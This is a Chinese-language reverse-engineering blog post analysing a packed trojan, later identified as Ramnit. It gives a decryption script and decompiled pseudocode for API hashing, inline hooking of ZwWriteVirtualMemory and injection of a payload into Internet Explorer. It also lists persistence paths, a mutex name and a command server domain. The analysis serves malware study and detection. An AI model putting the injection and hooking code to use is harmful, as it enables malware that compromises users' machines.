記一次木馬分析


layout: post
title: 記一次木馬分析
categories: Reverse_Engineering
description: 記一次木馬分析
keywords:
url: https://lichao890427.github.io/ https://github.com/lichao890427/


記一次木馬分析

準備工作

　　從txt中把16進制數據拷貝到WinHex,生成55k的exe文件,看pe節名發現upx殼,直接用upx脫殼機,得到82k的exe文件,目前為止能看到的pe節:

.code  00401000 0040A000 R . X . L para 0001 public CODE 32 0000 0000 0002 FFFFFFFF FFFFFFFF
.data  0040A000 00414000 R . . . L para 0002 public DATA 32 0000 0000 0002 FFFFFFFF FFFFFFFF
.rdata 00414000 00416000 R . . . L para 0003 public DATA 32 0000 0000 0002 FFFFFFFF FFFFFFFF

解密第一層

　　IDA分析出的所有函數都是沒有意義的空函數,主要混淆形式有:

  • 任意用無效參數調用api(因此導入表也基本是無用的),甚至存在檢測errorcode是否對應目標錯誤值的邏輯
    [圖片上傳失敗...(image-1246a4-1516627504447)]
  • 任意構造函數調用
    [圖片上傳失敗...(image-735930-1516627504447)]
  • 入口函數start無返回(這里有玄機)
    [圖片上傳失敗...(image-972fbc-1516627504447)]
  • 最后一個有效函數是sub_40724D這里,后面為無效數據(其實為真正代碼經過加密了)
    [圖片上傳失敗...(image-cd1f17-1516627504447)]

　　整個代碼只有j_VirtualAlloc的參數調用是有意義的,返回分配的0xf000字節內存地址(假定0x230000),每個函數調用最后會有jmp,要從jmp跟下去
[圖片上傳失敗...(image-29de4a-1516627504447)]

　　上圖中0x2CA9是相對于VirtualAlloc分配地址的偏移,其實是第一次解密結果的入口處(假定0x232CA9),下圖是對這段內存(假定0x230000~0x23f000)的解密,而使用的源數據恰好是無法正常反匯編的主函數那里(圖3 的0x401F46,在執行call sub_4083E2的時候入棧),要跟蹤新eip走向可以直接下內存斷點
[圖片上傳失敗...(image-3ef825-1516627504448)]

　　這里對(0x230000,0x23f000)的內存做解密操作,因此在ida中增加一個Segment(0x230000~0x23f000)來模擬,使用腳本解密:

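# IDAPython helper: decrypt the first layer of the sample into the simulated
# segment. Byte() and PatchByte() are IDA (idc) API names, so the patch loop
# only runs when this file is executed as a script inside IDA; decode_byte()
# is a plain function and can be checked on its own.
dstaddr = 0x230000  # simulated segment base (assumed VirtualAlloc result)
srcaddr = 0x401F44  # encrypted bytes inside the unpacked main image
payloadlen = 0xF000  # size of the allocated region being reconstructed


def decode_byte(b):
    """Decrypt one byte with the sample's per-byte transform.

    Steps, in order: xor with 0xA2, rotate the 8-bit value right by 2,
    subtract 0x6C modulo 256.

    b: encrypted byte, 0..255 (higher bits are masked off).
    Returns the decrypted byte as an int in 0..255.
    """
    b = (b & 0xFF) ^ 0xA2
    b = ((b & 0x3) << 6) | (b >> 2)  # 8-bit rotate right by 2
    return (b + 0x100 - 0x6C) & 0xFF


def decrypt_layer1(src=srcaddr, dst=dstaddr, length=payloadlen):
    """Decode `length` bytes starting at `src` and patch them to `dst` in the IDB.

    PatchByte is called inside the loop so every byte is written, not only
    the last one.
    """
    for off in range(length):
        PatchByte(dst + off, decode_byte(Byte(src + off)))


if __name__ == "__main__":
    decrypt_layer1()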

[圖片上傳失敗...(image-f8e96c-1516627504448)]

解密第二層

　　由前一步解密出的新節可以分析出以下函數:

GetFunction        +018C
fiximport          +04C2                
decode             +05E8
decode_1           +0743
getNtdllBase       +0783            
sub_2309AF         +09AF
UnmapSection       +0BD6
zeromem            +0C15
fixreloc           +1758
sub_2318FB         +18FB
decode_2           +1B35
Alloc              +1D68
resetself          +2275
memcpy             +22B0
decode_0           +2454
sub_2326F9         +26F9
sub_2326FB         +26FB
new_main           +2CA9
setmemoryexecute_  +2E13
loadimportdll      +2F2B
setmemoryexecute   +3077
GetFunctionFromEat +31D2
nullsub_5          +329D
Free               +32A0
nullsub_4          +32E2

來到入口點:

/*
 * Second-stage loader entry: lives at offset +2CA9 of the decrypted segment
 * (see the function table above). Hex-Rays pseudocode with undeclared
 * locals (v4, v30, perfinfo, ...): a reading aid, not compilable C.
 *
 * Resolves an ntdll export by hash, locates the host image by walking back
 * from the return address to an 'MZ' header, decrypts the payload stored
 * in the data section into a scratch buffer, copies it back over the host
 * image and repairs the PE (entry point, imports, relocations, sections).
 *
 * Returns: perfinfo.CopyOnWriteCount on the early-exit path; the main path
 * never returns here (it ends in JUMPOUT).
 */
ULONG __cdecl new_main(int a1, int a2, int a3, int segbase)// fourth argument: base of the memory block allocated earlier (0x230000)
{
  v30 = -1;
  v29 = 1;
  v17 = getNtdllBase(0xE0605F88);// analysis (1): module base looked up by hashed name
  NtQuerySystemInformation = (void (__stdcall *)(int, int, int, signed int, _SYSTEM_PERFORMANCE_INFORMATION *, signed int))GetFunction(v17, 0xFB145B9B);// analysis (2): export looked up by hashed name
  NtQuerySystemInformation(v20, v21, v22, 2, &perfinfo, 0x138);// SYSTEM_PERFORMANCE_INFORMATION: no practical use of the result was found
  result = perfinfo.CopyOnWriteCount;
  if ( (perfinfo.CopyOnWriteCount <= 0x84D0 || perfinfo.CopyOnWriteCount >= 0x8534)
    && (perfinfo.CopyOnWriteCount <= 0x8660 || perfinfo.CopyOnWriteCount >= 0x86C4) )// normally falls straight through into this branch
    // NOTE(review): the two excluded CopyOnWriteCount windows look like an environment check; purpose not established from this listing
  {
    v35 = segbase;
    modulebase = retaddr;                       // 0x40746D in figure 6: return address of the last call executed
    do
      modulebase = (_IMAGE_DOS_HEADER *)(((unsigned int)&modulebase[-1].e_lfanew + 3) >> 15 << 15);
    while ( modulebase->e_magic != 'ZM' );// step back in 0x8000-aligned units until an 'MZ' header is found: main module base 0x400000
    currentbase = modulebase;
    v31 = *(WORD *)((char *)&modulebase->e_cs + modulebase->e_lfanew);
    v44 = 12;
    v43 = 0x75115E4F;
    v42 = 0xFFD1A121;
    v41 = 0x17E;
    size = 0x6200;
    a3a = 0x937D;
    v40 = 0xC3A56632;
    imagesize = *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 80);// exe module size (SizeOfImage)
    setmemoryexecute_((int)modulebase, imagesize, 64, (int)&v27);// make the whole image read/write/execute (64 == PAGE_EXECUTE_READWRITE)
    v33 = (char *)currentbase + *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 40);// original entry point
    membase = Alloc(0, size);// scratch buffer for the decrypted payload
    for ( dataseg = (int)currentbase; *(_DWORD *)dataseg != 0xDF62A7E; ++dataseg );// scan for the 0xDF62A7E marker: start of the data section, analysis (3)
    v8 = dataseg + 4;
    decode(v8, a3a, v40);                       // decrypt the data section
    if ( v44 & 8 )
      a3a = decode_0((char *)v8, a3a, v42, v41);    // first pass
    v10 = decode_2((char *)v8, a3a, v43);           // second pass
    if ( v44 & 4 )
      decode_1(v11, (_BYTE *)membase, v10);     // third pass
    else
      memcpy((void *)membase, v10, a3a);
    if ( v44 & 0x10 )       // not taken in this sample (v44 == 12)
    {
      UnmapSection((int)currentbase);
      Free((char)currentbase, imagesize);
      v8 = *(_DWORD *)(membase + 60) + membase + 24;
      imagesize = *(_DWORD *)(*(_DWORD *)(membase + 60) + membase + 0x50);
      UnmapSection(*(_DWORD *)(v8 + 28));
      Free(*(_DWORD *)(v8 + 28), *(_DWORD *)(v8 + 56));
      currentbase = (void *)Alloc(*(_DWORD *)(v8 + 28), *(_DWORD *)(v8 + 56));
      *(_DWORD *)(__readfsdword(48) + 8) = currentbase;// rewrite ImageBase in the PEB
    }
    zeromem(v8, currentbase, imagesize);
    v9 = *(_DWORD *)(membase + 60) + membase;
    memcpy(currentbase, (const void *)membase, *(_DWORD *)(v9 + 0x54));// copy the decrypted headers back to 0x400000 (v9 + 0x54 is SizeOfHeaders)
    if ( v31 & 0x2000 )
      *(_WORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 22) = v26;
    v4 = *(_WORD *)(v9 + 6);
    v7 = v9 + 248;
    while ( v4 )// copy every section: NumberOfSections at v9 + 6, 40-byte section headers starting at v9 + 248
    {
      v15 = *(_DWORD *)(v7 + 16);
      memcpy((char *)currentbase + *(_DWORD *)(v7 + 12), (const void *)(membase + *(_DWORD *)(v7 + 20)), v24);
      v7 += 40;
      v4 = v6 - 1;
    }
    Free(membase, size);
    v32 = (char *)currentbase + *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 40);
    v16 = (char *)currentbase;
    resetself(// change the entry point
      (int)currentbase,// 0x400000  ImageBase
      (int)v33,// 0x42E000  old entry
      (int)v32,// 0x411390   new entry
      *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 80));// SizeOfImage
    fiximport((int)v16);// rebuild the import table
    v14 = *(_DWORD *)&v16[*((_DWORD *)v16 + 15) + 52];
    fixreloc(v25, v12);// apply relocations
    v13 = *(_WORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 6);
    JUMPOUT(&loc_230C9A);// continues at loc_230C9A, which sets the protection of each new section
  }
  return result;
}
  • 首先遇到的是getNtdllBase,該函數通過算法將模塊名事先計算出一個4字節值,再從peb結構出發遍歷dll鏈表得到指定模塊基址:
/*
 * Walks the PEB loader list and returns the DllBase of the module whose
 * hashed BaseDllName matches the requested signature, or 0 when the list is
 * exhausted. Hash per UTF-16 code unit: v2 = rol(v2, 7); low byte of v2 ^=
 * (low byte of the char | 0x20), i.e. ASCII lower-casing; the total is then
 * xored with 0x4B50FA82. Hex-Rays pseudocode.
 *
 * NOTE(review): new_main above calls this with 0xE0605F88 and passes
 * 0xFB145B9B to GetFunction, so the "ntdll == 0xFB145B9B" remark on the
 * signature line may actually describe the export-name hash; confirm against
 * the disassembly.
 */
int __cdecl getNtdllBase(int dllsig)// dllsig is matched against the hashed module name; the author notes ntdll corresponds to 0xFB145B9B (see NOTE above)
{
  int result; // eax@0
  int v2; // eax@2
  WCHAR *v3; // ecx@2
  int v4; // eax@7
  _LDR_DATA_TABLE_ENTRY *v5; // edx@1
  PLIST_ENTRY v6; // ebx@1

  v6 = (PLIST_ENTRY)(*(_DWORD *)(__readfsdword(48) + 12) + 12);// fs:[0x30] -> PEB, +12 -> Ldr, +12 -> _PEB_LDR_DATA->InLoadOrderModuleList
  v5 = (_LDR_DATA_TABLE_ENTRY *)v6->Flink->Flink;// starts at the second entry (presumably skipping the host exe) — confirm
  while ( (PLIST_ENTRY)v5 != v6 )
  {
    v3 = v5->BaseDllName.Buffer;
    v2 = 0;
    while ( *v3 )
    {
      v2 = __ROL4__(v2, 7);
      LOBYTE(v2) = (*(_BYTE *)v3 | 0x20) ^ v2;// lower-case the character before mixing it in
      ++v3;
    }
    v4 = v2 ^ 0x4B50FA82;
    if ( v4 == funcnamesig )// decompiler name; presumably the dllsig parameter — confirm
      return v5->DllBase;
    v5 = (_LDR_DATA_TABLE_ENTRY *)v5->InLoadOrderLinks.Flink;
    result = 0;
  }
  return result;// 0 when no module matched (left unset if the list is empty: decompiler artifact)
}
  • 然后遇到getFunction,該函數通過算法將函數名事先計算出一個4字節值,用作匹配DLL模塊導出表從而獲取函數基址
FARPROC __cdecl getFunction(int base, int funcsig)// base: module base (ntdll here); funcsig is matched against the hashed export name, e.g. NtAllocateVirtualMemory corresponds to 0x42025366
/*
 * Thin trampoline: forwards the caller's frame pointer to GetFunctionFromEat,
 * which reads (ntdllbase, sig) as [ebp+8] / [ebp+12]. Hex-Rays pseudocode.
 */
int __cdecl GetFunction(int ntdllbase, int sig)
{
  int v2; // ebp@0
  return GetFunctionFromEat(v2);// ebp is passed as-is, so inside the callee ebp+8 is the first argument, ebp+12 the second, and so on
}

/*
 * Export-by-hash lookup. a1 is the caller's ebp: [ebp+8] is the module base,
 * [ebp+12] the name hash. Locates IMAGE_EXPORT_DIRECTORY through the export
 * data directory (NT header + 0x78) and then jumps to loc_230925, the
 * matching loop over AddressOfNames that the decompiler did not inline.
 * Hex-Rays pseudocode.
 */
int __usercall GetFunctionFromEat@<eax>(int a1@<ebp>)
{
  DWORD v1; // esi@1
  _IMAGE_EXPORT_DIRECTORY *exportbase; // eax@1
  int sig; // ebx@1

  exportbase = (_IMAGE_EXPORT_DIRECTORY *)(*(_DWORD *)(a1 + 8)
                                         + *(_DWORD *)(*(_DWORD *)(*(_DWORD *)(a1 + 8) + 0x3C)
                                                     + *(_DWORD *)(a1 + 8)
                                                     + 0x78));// base + RVA of the export directory
  v1 = exportbase->AddressOfNames;
  *(_DWORD *)(a1 - 4) = exportbase->NumberOfNames;// stored in the caller's first local slot
  sig = *(_DWORD *)(a1 + 12);
  JUMPOUT(&loc_230925);// in reality a loop that hashes each export name and compares it with sig
}
  • 這個0xDF62A7E標志正是data段的起始,用od在新入口0x411390處轉儲exe

[圖片上傳失敗...(image-e13e0-1516627504448)]
[圖片上傳失敗...(image-c61f22-1516627504448)]

解密第三層

　　以上做的所有工作都是為了獲取入口點,dump出來的文件帶mediaplayer圖標,185k,入口代碼:

/*
 * Entry point of the dumped 185k stage (author's excerpt; the import
 * fix-up at the top is elided). Checks that iexplore.exe exists, uses a
 * named mutex as a single-instance guard, copies itself to the listed
 * paths, then launches IE with ZwWriteVirtualMemory hooked so the child can
 * be patched (see new_ZwWriteVirtualMemory). Never returns. Hex-Rays
 * pseudocode, not compilable C.
 */
void __usercall __noreturn start(int a1@<eax>, char *a2@<edx>, int a3@<ecx>, unsigned int a4@<ebp>)
{
// ... still repairing the import table (elided)
      if ( checkbrowserexist("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", 0x400u) == 1 )
      {
        v4 = createmutex("KyUffThOkYwRRtgPP");// mutex name: single-instance guard, also a host-based indicator
        if ( v4 )
        {
          destroymutex(v4);
          v4 = HANDLE_FLAG_INHERIT;
        }
        if ( v4 == HANDLE_FLAG_INHERIT )
        {
          v5 = GetModuleFileNameA(0, selffile, 0x104u);
          makecstring((BYTE *)selffile, v5);
          if ( CopyAndRunTrojan(selffile) == 1 )// copies itself to the following paths (locations to check on an infected host):
    //%CommonProgramFiles%/Microsoft/DesktopLayer.exe
    //%HOMEDRIVE%%HOMEPATH%/Microsoft/DesktopLayer.exe
    //%APPDATA%/Microsoft/DesktopLayer.exe
    //%SYSTEM%/Microsoft/DesktopLayer.exe
    //%TMP%/Microsoft/DesktopLayer.exe
//%ProgramFiles%/Microsoft/DesktopLayer.exe
            ExitProcess(0);
          if ( GetNtdllFunction() == 1 )// resolves ntdll function addresses for the payload that is injected into IE
          {
            hookZwWriteVirtualMemory();// author: not a plain inline hook at the entry point, the detour skips 5 instructions (see makeinlinehook)
            CreateProcess((LPSTR)"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", 1);
// from the surrounding logic, CreateProcess is what triggers NtWriteVirtualMemory
            unhookZwWriteVirtualMemory();
          }
        }
      }
      ExitProcess(0);
    }   

    /*
     * Installs a detour at procaddr: the first hookoff bytes (whole
     * instructions, per skipninst) are copied into a freshly allocated
     * trampoline followed by a jmp back to procaddr+hookoff, then procaddr
     * itself is overwritten with a 5-byte jmp to hookaddr. *a4 receives the
     * trampoline entry so the original can still be called (presumably the
     * old_ZwWriteVirtualMemory pointer used by the hook).
     * Returns 1 on success; v9 is otherwise uninitialized in this listing.
     * Hex-Rays pseudocode, not compilable C.
     */
    int __stdcall makeinlinehook(LPVOID procaddr, LPVOID hookaddr, int a4)
{
  if ( VirtualProtect(procaddr, 0xAu, 0x40u, &flOldProtect) )// 0x40 == PAGE_EXECUTE_READWRITE on the first 10 bytes
  {
    v3 = skipninst(procaddr, 5u);// a small instruction-length engine; NOTE(review): the author reads this as "skip 5 instructions", but the result is used below as the byte count to relocate, so it may rather be the instruction-aligned length covering 5 bytes — confirm
    hookoff = v3;
    dwSize = v3 + 10;
    shell = VirtualAlloc(0, v3 + 10, 0x1000u, 0x40u);// trampoline layout: 4-byte procaddr, 1-byte length, hookoff displaced bytes, 5-byte jmp back
    if ( shell )
    {
      v12 = shell;
      *(_DWORD *)shell = procaddr;
      *((_BYTE *)shell + 4) = hookoff;
      v5 = (int)shell + 5;
      memcpy(procaddr, (char *)shell + 5, hookoff);// NOTE(review): as decompiled the operands are dst=procaddr, src=shell+5, which would clobber procaddr with fresh memory; the trampoline needs the reverse — verify against the disassembly
      v6 = hookoff + v5;
      *(_BYTE *)v6 = 0xE9u;// jmp rel32 from the end of the displaced bytes back to procaddr + hookoff
      *(_DWORD *)(v6 + 1) = (_BYTE *)procaddr - (_BYTE *)v12 - 10;
      *(_BYTE *)procaddr = 0xE9u;// jmp rel32 from procaddr to hookaddr
      *(_DWORD *)((char *)procaddr + 1) = (_BYTE *)hookaddr - (_BYTE *)procaddr - 5;
      *(_DWORD *)a4 = (char *)v12 + 5;// hand the caller the trampoline entry (displaced bytes + jmp back)
      VirtualProtect(v12, dwSize, flOldProtect, &v10);
      v9 = 1;
    }
    VirtualProtect(procaddr, 0xAu, flOldProtect, &v10);// restore the original protection
  }
  return v9;
}

　　我自己做了個實驗,CreateProcess也確實觸發了NtWriteVirtualMemory,且目標句柄確實是IE的,所以重點在于掛鉤函數的分析:

// write access to const memory has been detected, the output may be wrong!
/*
 * Hook body installed over ZwWriteVirtualMemory in the parent. Lets the
 * original call through, then on the first write aimed at another process
 * (hProcess is not the current-process pseudo-handle and ieentry is still
 * unset) resolves the child's entry point, plants the payload via ModifyIe
 * and overwrites the entry with a 12-byte stub that calls into it.
 * Returns the original call's result unchanged. Hex-Rays pseudocode.
 */
__int64 __stdcall new_ZwWriteVirtualMemory(HANDLE hProcess, PVOID BaseAddress, PVOID Buffer, int NumberOfBytesToWrite, int *NumberOfBytesWritten)
{
  __int64 v5; // rax@1
  char *v6; // eax@3
  LONGLONG v7; // kr00_8@4
  __int64 v9; // [sp-20h] [bp-28h]@1
  SIZE_T NumberOfBytesWrittena; // [sp+0h] [bp-8h]@5
  DWORD oldpro; // [sp+4h] [bp-4h]@5

  LODWORD(v5) = old_ZwWriteVirtualMemory(
                  hProcess,                     // handle to the IE process
                  BaseAddress,                  // some address inside IE
                  Buffer,
                  NumberOfBytesToWrite,
                  NumberOfBytesWritten);
  v9 = v5;
  if ( hProcess != (HANDLE)-1 && !ieentry )// -1 is the current-process pseudo-handle; ieentry makes this a one-shot
  {
v6 = GetEntryPointForProcess(hProcess);
// reads IE's ImageBase from its PEB via ZwQueryInformationProcess, then parses the in-memory PE for the entry point
    if ( v6 )
    {
      dword_40DFA3 = 1;
      ieentry = v6;
      v7 = ModifyIe(hProcess, &injectcode, 0x9800);// injects the important data (INJECTSTR) and functions into the target process, see (1)(2)
      ie_inject_d = HIDWORD(v7);
      ie_inject_f = v7;
      if ( ie_inject_f )
      {
        VirtualProtectEx(hProcess, ieentry, 0xCu, 0x40u, &oldpro);
        WriteProcessMemory(hProcess, ieentry, &jmpshell, 0xCu, &NumberOfBytesWrittena);// rewrites the IE entry point logic
                                                // jmpshell hard-codes the following instructions; sizeof=0x0C
                                                // +00 0xBF            mov edi, ie_inject_f
                                                // +01 ie_inject_f
                                                // +05 0x68            push ie_inject_d
                                                // +06 ie_inejct_d
                                                // +0A 0xFF            call edi
                                                // +0B 0xD7
        VirtualProtectEx(hProcess, ieentry, 0xCu, oldpro, &oldpro);// restore the entry page protection
      }
    }
  }
  return v9;
}
  • 將自身的木馬種植到目標IE進程,同時修復PE結構
/*
 * Plants the embedded PE into hProcess. Probes, 0x10000 at a time from
 * ImageBase + 0x10010000 up to + 0x30000000, for an address that can be
 * reserved both locally and in the target (the local allocation is released
 * at once and only serves as a probe). Then rebuilds the PE in the target,
 * uploads the helper shellcodes and a copy of the INJECTSTR block.
 * Returns __PAIR__(address of the INJECTSTR copy, address of the
 * modifyieentry shellcode) packed in 64 bits, or 0 on any failure.
 * Hex-Rays pseudocode, not compilable C.
 */
LONGLONG __stdcall ModifyIe(HANDLE hProcess, BYTE *injectdata, int injectlen)
{
  v19 = 0x10000000;
  optheader = (IMAGE_OPTIONAL_HEADER32 *)validate_getoptionheader((int)injectdata, injectlen);// validates the PE structure
  if ( !optheader )
    goto LABEL_18;
  imagebase = optheader->ImageBase;
  imagesize = optheader->SizeOfImage;
  do                 // author: try to get the same address in both this process and IE; 0x3000 here is the allocation type (MEM_COMMIT|MEM_RESERVE), the size is imagesize
  {
    v19 += 0x10000;
    lpAddress = (LPVOID)(v19 + imagebase);
    injectbase = VirtualAlloc((LPVOID)(v19 + imagebase), imagesize, 0x3000u, 0x40u);
    if ( injectbase )
    {
      VirtualFree(injectbase, 0, 0x8000u);// local probe released immediately
      injectbase = VirtualAllocEx(hProcess, lpAddress, imagesize, 0x3000u, 0x40u);
    }
  }
  while ( v19 < 0x30000000 && !injectbase );
  if ( injectbase
&& ConstructPe(hProcess, injectbase, injectdata, injectlen, &inject_d, 0)
// rebuilds relocations, imports and each section from the PE embedded in the file; see (3)
    && WriteProcessMemory(hProcess, injectbase, (LPCVOID)inject_d.ImageBase, inject_d.ImageSize, 0)// 0xD000
    && (len1 = getshellcodelen((unsigned __int8 *)FixImportTable),
        (v5 = (int (__stdcall *)(_DWORD, int, int, INJECTSTR *))AllocMemoryforShellCode(hProcess, FixImportTable, len1)) != 0)
    && (inject_d.FixImportTable = v5,
        len2 = getshellcodelen((unsigned __int8 *)setsegproperty),
        (v7 = (int (__stdcall *)(DWORD))AllocMemoryforShellCode(hProcess, setsegproperty, len2)) != 0)
    && (inject_d.SetSegProperty = v7,
        inject_d.LdrLoadDll = (FARPROC)LdrLoadDll,
        inject_d.LdrGetDllHandle = (FARPROC)LdrGetDllHandle,
        inject_d.LdrGetProcedureAddress = (FARPROC)LdrGetProcedureAddress,
        inject_d.RtlInitString = (FARPROC)RtlInitString,
        inject_d.RtlAnsiStringToUnicodeString = (FARPROC)RtlAnsiStringToUnicodeString,
        inject_d.RtlFreeUnicodeString = (FARPROC)RtlFreeUnicodeString,
        inject_d.ZwProtectVirtualMemory = (FARPROC)ZwProtectVirtualMemory,
        inject_d.ZwDelayExecution = (FARPROC)ZwDelayExecution,
        a = GetModuleFileNameA(0, inject_d.ImagePath, 0x104u),
        makecstring((BYTE *)inject_d.ImagePath, a),
        len3 = getshellcodelen((unsigned __int8 *)modifyieentry),
        (v9 = AllocMemoryforShellCode(hProcess, modifyieentry, len3)) != 0)
    && (v13 = (unsigned int)v9, (v10 = AllocMemoryforShellCode(hProcess, &inject_d, 0x138u)) != 0) )// 0x138 == sizeof(INJECTSTR)
  {
    result = __PAIR__((unsigned int)v10, v13);// high dword: INJECTSTR copy; low dword: modifyieentry shellcode
  }
  else
  {
LABEL_18:
    result = 0i64;
  }
  return result;
}
  • 寫入的數據ie_inject_d結構
; Parameter block copied into IE (see ModifyIe) and handed to the injected
; entry stub (see modifyieentry). 0x138 bytes.
00000000 INJECTSTR       struc ; (sizeof=0x138, mappedto_37) ; XREF: ModifyIe/r
00000000 ImageBase       dd ?           ; base of the injected payload
00000004 ImageEntry      dd ?           ; entry point of the injected payload
00000008 ImageSize       dd ?
0000000C FixImportTable  dd ?           ; shellcode used to repair the import table
00000010 SetSegProperty  dd ?           ; shellcode used to repair PE section attributes
00000014 LdrLoadDll      dd ?                    ; offset
00000018 LdrGetDllHandle dd ?                    ; offset
0000001C LdrGetProcedureAddress dd ?             ; offset
00000020 RtlInitString   dd ?                    ; offset
00000024 RtlAnsiStringToUnicodeString dd ?       ; offset
00000028 RtlFreeUnicodeString dd ?               ; offset
0000002C ZwProtectVirtualMemory dd ?             ; offset
00000030 ZwDelayExecution dd ?                   ; offset
00000034 ImagePath       db 260 dup(?)      ; path of the parent (dropper) program
00000138 INJECTSTR       ends

ie_inject_f函數仍然是修復導入表:

/*
 * Shellcode run inside IE from the patched entry point (ie_inject_f), with
 * the INJECTSTR block as its argument. Repairs the payload's imports, applies
 * each section's protection through ZwProtectVirtualMemory, calls the payload
 * entry with (ImageBase, 1, ImagePath) and then blocks in ZwDelayExecution.
 * EFLAGS are saved on entry and restored before returning.
 * Hex-Rays pseudocode, not compilable C.
 */
void __cdecl modifyieentry(INJECTSTR *injectdata)
{
  v1 = __readeflags();
  v6 = v1;
  if ( injectdata && injectdata->FixImportTable(0, injectdata->ImageBase, injectdata->ImageSize, injectdata) )
  {
    secnum = *(_WORD *)(*(_DWORD *)(injectdata->ImageBase + 60) + injectdata->ImageBase + 6);// NumberOfSections
    secheaders = (IMAGE_SECTION_HEADER *)(*(_WORD *)(*(_DWORD *)(injectdata->ImageBase + 60) + injectdata->ImageBase + 20)
                                        + *(_DWORD *)(injectdata->ImageBase + 60)
                                        + injectdata->ImageBase
                                        + 24);// first section header: NT header + 24 + SizeOfOptionalHeader
    if ( *(_WORD *)(*(_DWORD *)(injectdata->ImageBase + 60) + injectdata->ImageBase + 6) )
    {
      do
      {
        v4 = secnum;
        v5 = injectdata->SetSegProperty(secheaders->Characteristics);// section Characteristics -> page protection value
        v10 = secheaders->VirtualAddress + injectdata->ImageBase;
        v9 = secheaders->Misc.PhysicalAddress;
        ((void (__stdcall *)(signed int, DWORD *, DWORD *, int, char *))injectdata->ZwProtectVirtualMemory)(// -1: current process; region = section VA, size = Misc (VirtualSize)
          -1,
          &v10,
          &v9,
          v5,
          &v11);
        ++secheaders;
        secnum = v4 - 1;
      }
      while ( v4 != 1 );
    }
    ((void (__stdcall *)(int, signed int, char *))injectdata->ImageEntry)(// call the injected payload's entry
      injectdata->ImageBase,
      1,
      injectdata->ImagePath);
    v7 = 0;
    v8 = 0x80000000;// v7/v8 form the delay interval; presumably the most-negative LARGE_INTEGER, i.e. an effectively indefinite relative wait — confirm
    ((void (__stdcall *)(_DWORD, int *))injectdata->ZwDelayExecution)(0, &v7);
  }
  __writeeflags(v6);
}
  • 內嵌PE
    [圖片上傳失敗...(image-3ee0f4-1516627504448)]

　　上面的一切努力最后發現重點在于內嵌PE邏輯中,直接用winhex將0x404031處0xD000大小的內嵌PE取出,結果52k

內嵌PE

[圖片上傳失敗...(image-d5faa3-1516627504448)]
　　這次IDA已經可以分析出來了,說明是最終形態,搜索一些敏感的字符串可知是Ramnit病毒 http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/viruswin32ramnita ,發現網上已有分析,因此沒有繼續分析,不過上述加密手段還有很多學習之處

  • 感染全盤exe dll,改寫入口點,增加新PE節.rmnet用于存儲惡意木馬
  • 感染html htm,增加如下腳本,在用戶%TEMP%文件夾中植入了一個名為“svchost.exe”的二進制文件并執行關聯的ActiveX控件,受感染的用戶主機會試圖連接到與Ramnit相關的一個木馬控制服務器——fget-career.com。如下兩圖所示
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容